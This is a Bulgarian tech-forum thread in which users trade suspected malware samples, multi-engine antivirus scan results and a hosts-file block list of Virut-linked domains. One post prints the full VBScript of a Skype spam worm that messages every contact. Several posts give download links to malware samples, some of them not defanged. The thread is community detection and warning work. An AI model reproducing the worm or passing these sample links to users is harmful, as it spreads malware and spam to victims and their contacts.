Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции,откриване на нови заплахи - част 5

Featured Replies

hxxp://rghost.ru/261793 a-squared 4.0.0.101 2009.05.30 Trojan.Win32.KillAV!IK Antiy-AVL 2.0.3.1 2009.05.27 Trojan/Win32.KillAV BitDefender 7.2 2009.05.30 MemScan:Trojan.Generic.1857123 Comodo 1215 2009.05.29 Unclassified Malware eSafe 7.0.17.0 2009.05.27 Suspicious File GData 19 2009.05.30 MemScan:Trojan.Generic.1857123 Пак ли е фалшива тревога за Нод 32? Има ли други отличници?

  • Отговори 1,3k
  • Прегледи 105,1k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

  • http://virscan.org/report/9a69280751a6614b821e81f2ed38f1e5.html Появи се първият с класифициране. Вариантните защити IDS + HIPS са с безпроблемно справяне и също блокират. ESET и останалите уж лид

  • File setup_build8_173.exe received on 2009.09.19 18:33:47 (UTC) Result: 7/41 (17.08%) Antivirus Version Last Update Result a-squared 4.5.0.24 2009.09.19 Trojan-Downloader.Win32.FraudLoad!IK DrWe

  • hxxp://search.4shared.com/network/search.jsp?searchmode=2&searchName=teracopy Защитата ми блокира изтеглянето на всички файлове от тип "teracopy". Били тествани с KAV. Вярно ли е това? И наист

Публикувани изображения

Отново се появиха масовите СПАМ препратки в Skype ,ето една от връзките водещи към VBScript Script File :

http://www.teen4eta.com/webcam.html
VIRUSTOTALResult: 3/40 (7.5%) В архива: JOw93696.jpg Самия скрипт:
on error resume next


set yADAl = Wscript.CreateObject("Skype4COM.Skype", "Skype_")

yADAl.Client.Start()

yADAl.Attach()

For Each GAG In yADAl.Friends

yADAl.SendMessage GAG.handle," az moga da te gledam prez skype.. bez dori da imash kamera (devil) ako iska6 i ti da moje6 da gleda6 horata taka vlez tuk www.teen4eta.com/webcam.html "

next

СПАМ ,чрез разпространение до всички ваши приятели в Skype.

Детска му работа biggrin.gif,за съжаление има все още хора,на които липсва елементарна хигиена при сърфиране и кликващи на всичко, което се появи пред очите им.

P.s. Ще шпионирате приятелите си ,а :)

Много смешно изпълнение,поне да бяха редактирали посланието вътре в скрипта на КИРИЛИЦА

Редактирано от mihnev_sz (преглед на промените)

hxxp://rghost.ru/261793 a-squared 4.0.0.101 2009.05.30 Trojan.Win32.KillAV!IK Antiy-AVL 2.0.3.1 2009.05.27 Trojan/Win32.KillAV BitDefender 7.2 2009.05.30 MemScan:Trojan.Generic.1857123 Comodo 1215 2009.05.29 Unclassified Malware eSafe 7.0.17.0 2009.05.27 Suspicious File GData 19 2009.05.30 MemScan:Trojan.Generic.1857123 Пак ли е фалшива тревога за Нод 32? Има ли други отличници?

http://www.virustotal.com/analisis/dd97017...5594-1243712648

http://www.virustotal.com/analisis/8e43981...9821-1243712636

62.211.68.12/irbray/InternetAntivirusPro.exe

cff30ab595a7b361.jpg

KAV 8 WKS

30.5.2009 г. 23:01:58 Вредоносный HTTP-объект <http://62.211.68.12/irbray/InternetAntivirusPro.exe//script>: обнаружено: вирус 'not-a-virus:FraudTool.Win32.InternetAntivirusPro.l'.

бяла страница , ами аваст какво засича

5a503e2dd18d50f4.jpg

exearchstortage.com/important.exe

това си е файл

876036G.jpg

изключих мрежовия и интернет щита и броузерите и при мен зареждат бели страници

като wot се обажда при ff

c2b43f88c8430a79.jpg

8ekdje.cn/09/index.html

е това няма как да не е заразена страница

876046a.jpg

Редактирано от nikssi (преглед на промените)

Нещо данните от Вирустотал не се предоставят публично.До 5-renus2008.com имам свободен нормален достъп - коя и каква е реалността? Поздрави

uVi14809.jpg

http://4storing.com/fpkeck/e43db07f7b13044...5d4e1b5dd4.html

Това е файл от C:\Program Files\Mozilla Firefox\components от виртуалния ми компютър.

Symantec Endpoint Protection 11 го класифицира като Downloader и го изтрива автоматично, добре че го поставя под карантина, че успях да го ресторна и сложа в изключенията та да мога да го изпратя на VirusTotal

Вие как мислите дали е фалшива тревога, и ползващите версия Firefox 3.0.10 дали имат същия файл, и дали се засича, като моя....

http://4storing.com/fpkeck/e43db07f7b13044...5d4e1b5dd4.html

Това е файл от C:\Program Files\Mozilla Firefox\components от виртуалния ми компютър.

Symantec Endpoint Protection 11 го класифицира като Downloader и го изтрива автоматично, добре че го поставя под карантина, че успях да го ресторна и сложа в изключенията та да мога да го изпратя на VirusTotal

Вие как мислите дали е фалшива тревога, и ползващите версия Firefox 3.0.10 дали имат същия файл, и дали се засича, като моя....

При мен го няма този DLL в папката на Mozilla Firefox,това засича Kaspersky

wNf74410.jpg

Някой ще се пробва ли тук ?

ВНИМАНИЕ ИМА ОПАСТНОСТ ОТ ЗАРАЗА С Virut !

Сайтовете ще бъдат блокирани в hphosts и WoT !

Да не кажете, че не съм ви предупредил !!!

127.0.0.1 jL.chura.pl

#.0.0.1 www.powernum123.com

127.0.0.1 www.powernum123.com.cn

127.0.0.1 powernum123.com

127.0.0.1 powernum123.com.cn

127.0.0.1 www.chebl.com

127.0.0.1 www.chebl.cn

127.0.0.1 www.chebl.com.cn

127.0.0.1 chebl.com

127.0.0.1 chebl.com.cn

127.0.0.1 chebl.cn

127.0.0.1 www.chebuluo.com.cn

127.0.0.1 www.chebuluo.com

127.0.0.1 www.chebuluo.cn

127.0.0.1 chebuluo.com.cn

127.0.0.1 chebuluo.com

127.0.0.1 chebuluo.cn

127.0.0.1 www.17sp.com

127.0.0.1 www.17sp.com.cn

127.0.0.1 17sp.com

127.0.0.1 17sp.com.cn

127.0.0.1 www.feikong.com

127.0.0.1 www.feikong.com.cn

127.0.0.1 www.feikong.cn

127.0.0.1 feikong.com

127.0.0.1 feikong.com.cn

127.0.0.1 feikong.cn

127.0.0.1 www.hacong.com

127.0.0.1 hacong.com

127.0.0.1 www.xbxbxbxb.com

127.0.0.1 www.sobt.com

127.0.0.1 www.sobt.com.cn

127.0.0.1 www.sobt.cn

127.0.0.1 www.sobt.net

127.0.0.1 sobt.com

127.0.0.1 sobt.com.cn

127.0.0.1 sobt.cn

127.0.0.1 sobt.net

hxxp://uploading.com/files/6BVFLZ7F/Trojan_Hunter_5.1_Build_973.rar.html Резултатите не ми се коментират http://www.virustotal.com/ru/analisis/add3...16c1-1243837027 Файл Trojan_Hunter_5.1_Build_973.rar получен 2009.06.01 06:17:07 (UTC)

Результат: 23/40 (57.5%)

Антивирус Версия Обновление Результат

a-squared 4.0.0.101 2009.06.01 Trojan-Spy.Win32.Banker!IK

AhnLab-V3 5.0.0.2 2009.05.31 Packed/Upack

AntiVir 7.9.0.180 2009.05.30 -

Antiy-AVL 2.0.3.1 2009.06.01 -

Authentium 5.1.2.4 2009.06.01 W32/Heuristic-210!Eldorado

Avast 4.8.1335.0 2009.05.31 -

AVG 8.5.0.339 2009.06.01 Suspicion: unknown virus

BitDefender 7.2 2009.06.01 -

CAT-QuickHeal 10.00 2009.06.01 (Suspicious) - DNAScan

ClamAV 0.94.1 2009.06.01 -

Comodo 1227 2009.06.01 UnclassifiedMalware

DrWeb 5.0.0.12182 2009.05.29 -

eSafe 7.0.17.0 2009.05.27 Win32.PackedUpack.A

eTrust-Vet 31.6.6530 2009.05.30 -

F-Prot 4.4.4.56 2009.06.01 W32/Heuristic-210!Eldorado

F-Secure 8.0.14470.0 2009.06.01 W32/Packed_Upack.A

Fortinet 3.117.0.0 2009.06.01 PossibleThreat

GData 19 2009.06.01 -

Ikarus T3.1.1.57.0 2009.06.01 -

K7AntiVirus 7.10.749 2009.05.29 Trojan.Win32.Malware.1

Kaspersky 7.0.0.125 2009.06.01 -

McAfee 5632 2009.05.31 Generic.dx!br

McAfee+Artemis 5632 2009.05.31 Generic.dx!br

McAfee-GW-Edition 6.7.6 2009.05.29 Win32.Malware.gen!92 (suspicious)

Microsoft 1.4701 2009.06.01 -

NOD32 4117 2009.05.30 -

Norman 6.01.05 2009.05.29 W32/Packed_Upack.A

nProtect 2009.1.8.0 2009.05.31 -

Panda 10.0.0.14 2009.05.31 Trj/CI.A

PCTools 4.4.2.0 2009.05.31 Packed/Upack

Prevx 3.0 2009.06.01 -

Rising 21.32.00.00 2009.06.01 Trojan.Spy.Win32.Undef.GEN [suspicious]

Sophos 4.42.0 2009.06.01 Mal/Generic-A

Sunbelt 3.2.1858.2 2009.05.31 Trojan.Win32.Packer.Upack0.3.9 (v)

Symantec 1.4.4.12 2009.06.01 -

TheHacker 6.3.4.3.334 2009.05.29 W32/Behav-Heuristic-060

TrendMicro 8.950.0.1092 2009.06.01 PAK_Generic.006

VBA32 3.12.10.6 2009.05.31 -

ViRobot 2009.6.1.1762 2009.06.01 -

VirusBuster 4.6.5.0 2009.05.31 Packed/Upack

Редактирано от TNN (преглед на промените)

С благодарности към Jaxryley от Malwarebytes' Anti-Malware...

hXXp://4storing.com/3w8ot7/7c432faf727db89d1a3e295cfe676e01.html

Редактирано от B-boy[StyLe] (преглед на промените)

С благодарности към Jaxryley от Malwarebytes' Anti-Malware...

hXXp://4storing.com/3w8ot7/7c432faf727db89d1a3e295cfe676e01.html

a-squared 4.0.0.101 2009.06.01 Trojan.Win32.Alureon!IK

AhnLab-V3 5.0.0.2 2009.06.01 Dropper/Agent.151044

AntiVir 7.9.0.180 2009.05.30 -

Antiy-AVL 2.0.3.1 2009.06.01 Trojan/RAR.Qhost

Authentium 5.1.2.4 2009.06.01 -

Avast 4.8.1335.0 2009.05.31 Win32:Trojan-gen {Other}

AVG 8.5.0.339 2009.06.01 Win32/Cryptor

BitDefender 7.2 2009.06.01 Trojan.Agent.AMYR

CAT-QuickHeal 10.00 2009.06.01 TrojanDropper.Agent.asar

ClamAV 0.94.1 2009.06.01 -

Comodo 1227 2009.06.01 TrojWare.Win32.TrojanDropper.BHO.Gen

DrWeb 5.0.0.12182 2009.05.29 Trojan.Fakealert.origin

eSafe 7.0.17.0 2009.06.01 Suspicious File

eTrust-Vet 31.6.6533 2009.06.01 Win32/Hostblock

F-Prot 4.4.4.56 2009.06.01 -

F-Secure 8.0.14470.0 2009.06.01 Trojan:W32/Autorun.JE

Fortinet 3.117.0.0 2009.06.01 W32/Zlob.ASM!tr

GData 19 2009.06.01 Trojan.Agent.AMYR

Ikarus T3.1.1.57.0 2009.06.01 -

K7AntiVirus 7.10.749 2009.05.29 -

Kaspersky 7.0.0.125 2009.06.01 Trojan.Win32.Tdss.afdt

McAfee 5632 2009.05.31 Generic Dropper.cx

McAfee+Artemis 5632 2009.05.31 Artemis!CFC44F26402B

McAfee-GW-Edition 6.7.6 2009.05.29 Win32.Malware.gen!82 (suspicious)

Microsoft 1.4701 2009.06.01 Trojan:Win32/Alureon.gen!J

NOD32 4118 2009.06.01 a variant of Win32/Kryptik.QY

nProtect 2009.1.8.0 2009.06.01 -

Panda 10.0.0.14 2009.05.31 Trj/CI.A

PCTools 4.4.2.0 2009.06.01 -

Prevx 3.0 2009.06.01 Medium Risk Malware

Rising 21.32.02.00 2009.06.01 Packer.Win32.UnkPacker.a [suspicious]

Sophos 4.42.0 2009.06.01 Mal/Generic-A

Symantec 1.4.4.12 2009.06.01 Trojan.Dropper

TheHacker 6.3.4.3.334 2009.05.29 Adware/Agent.gen

TrendMicro 8.950.0.1092 2009.06.01 PAK_Generic.001

ViRobot 2009.6.1.1763 2009.06.01 Trojan.Win32.Agent.48128.Y

С благодарности към Jaxryley от Malwarebytes' Anti-Malware...

hXXp://4storing.com/3w8ot7/7c432faf727db89d1a3e295cfe676e01.html

33dc30495d3d6004.jpg

Твоята явно нищо не хваща :computer2:

Да, така е- като ползвам поне 5 броя антивирусни. Поне една от тях всеки път пропуска да реагира - нали трябва да мога да изтегля файла и да се чудя дали не е фалшива тревога.... Затова вече не пиша конкретно за никоя. Убедих се - идеалната е налице само в мечтите... Поздрави

Да, така е- като ползвам поне 5 броя антивирусни. Поне една от тях всеки път пропуска да реагира - нали трябва да мога да изтегля файла и да се чудя дали не е фалшива тревога.... Затова вече не пиша конкретно за никоя. Убедих се - идеалната е налице само в мечтите... Поздрави

Кой говори за идеална ?

Пита се, колко лови антивирусната ти ?

Като не лови нищо, напиши "0 открити" и готово.

Avira:

The file 'dseo13b.exe' has been determined to be 'MALWARE'. Our analysts named the threat SPR/Tool.Driverunsign. The term "SPR/" ("Security or Privacy Risk") denotes a program that might possibly be able to affect the security of your system, might trigger activities you might not want or might violate your privacy.Detection is added to our virus definition file (VDF) starting with version 7.01.04.19.

С благодарности към Jaxryley от Malwarebytes' Anti-Malware...

hXXp://4storing.com/3w8ot7/7c432faf727db89d1a3e295cfe676e01.html

Symantec EndPoint Protection 11 засега работи задоволително добре на виртуалната машина с WIn XP SP3, въпреки че както винаги позволява изтеглянето на архива, но след разархивиране последва унищожаване:

881027N.jpg

Но се наложи първо да изключа уеб контрола на НОД32 4.0.424.0 на хоста с Win 7, защото не допусна да мине по трафика изтеглянето на файла към виртуалката - така и трябва....:

881071b.jpg

С благодарности към Jaxryley от Malwarebytes' Anti-Malware...

hXXp://4storing.com/3w8ot7/7c432faf727db89d1a3e295cfe676e01.html

7zp85847.jpg

LjZ85745.jpg

hxxp://uploading.com/files/4SB3TUHF/Advanced.Defrag.v2.6.Cracked-ViRiLiTY.rar.html Arcavir 2009 200906020551 2009-06-02 Trojan.Dropper.Agent.Aivj и Fortinet 3.117.0.0 2009.06.02 Misc/SpywareCease. Това дефрагментиращо творение би трябвало още неща да може и прави. Обаче реагират само две от по-малко известните програми. Има ли други?

С благодарности към Jaxryley от Malwarebytes' Anti-Malware...

hXXp://4storing.com/3w8ot7/7c432faf727db89d1a3e295cfe676e01.html
883256h.jpg Колко са заразените файлове вътре :rolleyes: Тука някой засича ли нещо
http://4storing.com/akzmap/75a2286bc3d1c11b7828ad554191e6a6.html

NOD упорито отказва да го класифицира, от седмица им пращам файлове и този също но реакция няма

http://www.virustotal.com/analisis/ae102aa...4df7-1243969351

....

NOD упорито отказва да го класифицира, от седмица им пращам файлове и този също но реакция няма

http://www.virustotal.com/analisis/ae102aa...4df7-1243969351

Щом не го добавят, явно е чист. Аз неможах да го отворя. Програмата ми даде error

Тука някой засича ли нещо

http://4storing.com/akzmap/75a2286bc3d1c11b7828ad554191e6a6.html

NOD упорито отказва да го класифицира, от седмица им пращам файлове и този също но реакция няма

http://www.virustotal.com/analisis/ae102aa...4df7-1243969351

ef671825.jpg

VIRUSTOTAL-Result: 13/40 (32.5%)

Редактирано от mihnev_sz (преглед на промените)

При Вирустотал изглежда на IkarusT3.1.1.57.0 са му забранили да се изявява! Обаче са забравили на наличието на енджина му и при A-squared. Да се чуди човек какво да мисли. Да не им е хрумнало да доказват нивото примерно на Нод 32 !? Ами направо да ги бяха махнали австрийските програми от там...Поздрави

Гост
Тази тема е заключена за нови отговори.

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.